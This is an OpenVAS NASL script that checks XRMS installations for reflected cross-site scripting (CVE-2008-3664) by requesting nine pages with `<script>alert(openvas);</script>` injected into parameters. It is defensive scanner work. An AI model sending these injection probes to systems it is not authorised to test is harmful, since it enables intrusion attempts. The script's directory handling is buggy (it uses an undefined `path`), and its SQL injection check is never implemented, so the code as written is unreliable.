# OpenVAS Vulnerability Test
# $Id$
# Description: 
# Multiple Cross Site Scripting (XSS) and SQL injection Vulnerabilities
#in XRMS, CVE-2008-3664 
#
# XRMS-CVE-2008-3664.nasl
#
#TODO: implements sql injection check in admin/users/self-2.php
#          it is possible to edit name/email of any user using SQL injection
#           	
#
# Author:
# Christian Eric Edjenguele <christian.edjenguele@owasp.org>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 or later,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

if(description)
{
script_id(101008);
script_cve_id("CVE-2008-3664 ");
name["english"] = "Multiple Cross Site Scripting and SQL Injection vulnerabilities in XRMS";
script_name(english:name["english"]);
 
desc["english"] = "

XRMS is a web-based application for managing business entities such as
employees, customers, contacts, activities.
The application is vulnerable to simple Cross Site Scripting, which can
be used for several isues. 


Solution : 

Upgrade to the latest version of this software

Risk factor: High";


script_description(english:desc["english"]);
 
summary["english"] = "XRMS is prone to multiple XSS and SQL injection vulnerabilities";
 
script_summary(english:summary["english"]);

script_category(ACT_ATTACK);
 
script_copyright(english:"This script is Written by Christian Eric Edjenguele <christian.edjenguele@owasp.org> and released under GPL v2 or later");
family["english"] = "CGI abuses : XSS";
script_family(english:family["english"]);
script_dependencies("http_version.nasl", "cross_site_scripting.nasl");
script_require_ports("Services/www");
script_exclude_keys("Settings/disable_cgi_scanning");

exit(0);
}


#
# The script code starts here
#

include("http_func.inc");
include("http_keepalive.inc");


ports = get_kb_list("Services/www");


pages = make_list("/login.php?target=<script>alert(openvas);</script>",
	 "/activities/some.php?title=<script>alert(openvas);</script>",
	 "/companies/some.php?company_name=<script>alert(openvas);</script>",
	 "/contacts/some.php?last_name=<script>alert(openvas);</script>",
	 "/campaigns/some.php?campaign_title=<script>alert(openvas);</script>",
	 "/opportunities/some.php?opportunity_title=<script>alert(openvas);</script>",
	 "/cases/some.php?case_title=<script>alert(openvas);</script>",
	 "/files/some.php?file_id=<script>alert(openvas);</script>",
	 "/reports/custom/mileage.php?starting=<script>alert(openvas);</script>");


function scriptDirs()
{
	local_var kb;
	
	if ( get_kb_item("Settings/disable_cgi_scanning") ) return NULL;
	
	kb = get_kb_list("/tmp/cgibin");
	
	if(isnull(kb))	
		kb = make_list("/cgi-bin", "/scripts", "xrms", "");
	
	else 
		kb = make_list(kb, "");
 
	return (kb); 
}


function xssExploit(install_path)
{
	foreach php (pages)
	{
		foreach port (ports){

			req = http_get(port:port, item:string(path, php));
			res = http_keepalive_send_recv(port:port, data:req, bodyonly:1);

			if ( res == NULL ) exit(0);
		
			if ("<script>alert(openvas);</script>" >< res )
			{
				set_kb_item (name:"XRMS/installed", value:TRUE);
				security_note(port);
				exit(0);
			}
		}
	}
}

foreach xrms_dir ( scriptDirs() )
{
	xssExploit(install_path:xrms_dir);
}

